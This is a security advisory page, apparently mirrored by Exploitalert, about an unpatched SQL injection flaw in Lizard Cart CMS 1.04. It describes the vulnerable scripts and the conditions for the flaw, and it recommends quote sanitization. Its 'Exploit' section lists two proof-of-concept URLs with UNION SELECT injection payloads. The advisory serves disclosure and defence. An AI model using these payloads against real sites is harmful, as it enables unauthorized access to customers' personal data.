Advertisement






Lizard Cart CMS SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2006-01-07
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.7322 0.962

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006010004

Below is a copy:

New eVuln Advisory:
Lizard Cart CMS SQL Injection Vulnerability

--------------------Summary----------------

Software: Lizard Cart CMS
Sowtware's Web Site: http://sourceforge.net/projects/lizardcart
Versions: 1.04
Critical Level: Dangerous
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Published: 2006.01.03
eVuln ID: EV0012

-----------------Description--------------
Vulnerable scripts:
pages.php
detail.php

Variable $id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Customers personal data is threatened.

Conditions:
register_globals = on
gpc_magic_quotes = off

--------------Exploit---------------------
http://host/lizard/pages.php?id=-1'%20union%20select%201,2,3/*
http://host/lizard/detail.php?id=-1'%20union%20select%201,2,3,4,5,6,7,8/
*

Conditions:
register_globals = on
gpc_magic_quotes = off

--------------Solution---------------------
No patch availabve.
Edit source code. Quotes sanitation is needed.

--------------Credit---------------------
Original Advisory:
http://evuln.com/vulns/12/summary.html

Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum